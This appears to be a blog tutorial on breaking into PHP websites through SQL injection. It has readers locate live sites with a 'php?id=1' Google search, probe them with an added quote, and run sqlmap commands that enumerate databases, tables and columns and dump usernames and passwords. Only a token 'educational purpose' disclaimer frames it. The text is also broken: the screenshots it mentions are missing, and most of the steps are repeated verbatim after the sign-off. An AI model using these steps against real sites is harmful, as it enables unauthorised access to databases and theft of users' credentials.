Hacking a vulnerability website:
You think hacking a website is an easy task. Haha, indeed it is. There are few vulnerabilities websites that can be hacked easily and can gain useful information like username, passwords, and much more. This is only for educational purpose and is to acknowledge about the security issues. Ok, now let's get into it:
- Websites are made via different programs/ideas. Some make by using Php, HTML, JavaScript, and few other programming languages.
- Those website that is made using Php language are more likely to be hacked easily and today we are going to discuss on it.
- To find out the vulnerabilities website go to google and type php?id=1.
- There you can see several websites that are made using Php.
- To test whether the site is vulnerable or not you can add " ' " in the URL. For example, if the website URL is www.vulnerability.com/page.php?id=1 then to test the website is whether vulnerable or not add " ' " in the URL; as for the example above it becomes: www.vulnerability.com/page.php?id=1'.
- Then it shows following error message:
- Now once it shows this message we will be using SQL injection technique. This allows us to enter into the vulnerability website. Now, open terminal and type following code :
==> sqlmap -u (URL) --dbs
Here dbs stands for database system. Doing this it checks the database of the website and following window will appear.
- Above you can see that there is two database present on that website. Now, let's enter into the "www" database. to do so type following command:
==> sqlmap -u (URL) -D (Database name) --tables
This allows you to explore tables present in that database.
Here is the table of that database -www-
- After you enter into the tables of that database you now need to do is to note down a particular table that you want to go further. And type following command:
==> sqlmap -u (URL) -D (Database name) -T (Table name) --columns
Now you see tables. In this case its like this:
- Now we are into the columns of that database's table. Now what we need is password and username. So, you can write following codes to inject into that respective columns:
==> sqlmap -u (URL) -D (Database name) -T (Table name) -C (Column name) --dump
Note : IF YOU WANT MULTIPLES COLUMNS TO OPEN THEN YOU CAN WRITE EACH COLUMN FOLLOWED BY COMMA
- As you run the above mentioned command it injects into the column and displays you all the information available in that column. In my case it's like:
- Here it is ........ 😊
This is only for educational purpose....
Enjoy your day !!! Keep visiting my blog.........
- Now once it shows this message we will be using SQL injection technique. This allows us to enter into the vulnerability website. Now, open terminal and type following code :
==> sqlmap -u (URL) --dbs
Here dbs stands for database system. Doing this it checks the database of the website and following window will appear.
- Above you can see that there is two database present on that website. Now, let's enter into the "www" database. to do so type following command:
==> sqlmap -u (URL) -D (Database name) --tables
This allows you to explore tables present in that database.
Here is the table of that database -www-
- After you enter into the tables of that database you now need to do is to note down a particular table that you want to go further. And type following command:
==> sqlmap -u (URL) -D (Database name) -T (Table name) --columns
- Now we are into the columns of that database's table. Now what we need is password and username. So, you can write following codes to inject into that respective columns:
==> sqlmap -u (URL) -D (Database name) -T (Table name) -C (Column name) --dump
Note : IF YOU WANT MULTIPLES COLUMNS TO OPEN THEN YOU CAN WRITE EACH COLUMN FOLLOWED BY COMMA
- As you run the above mentioned command it injects into the column and displays you all the information available in that column. In my case it's like:
- Here it is ........ 😊
No comments:
Post a Comment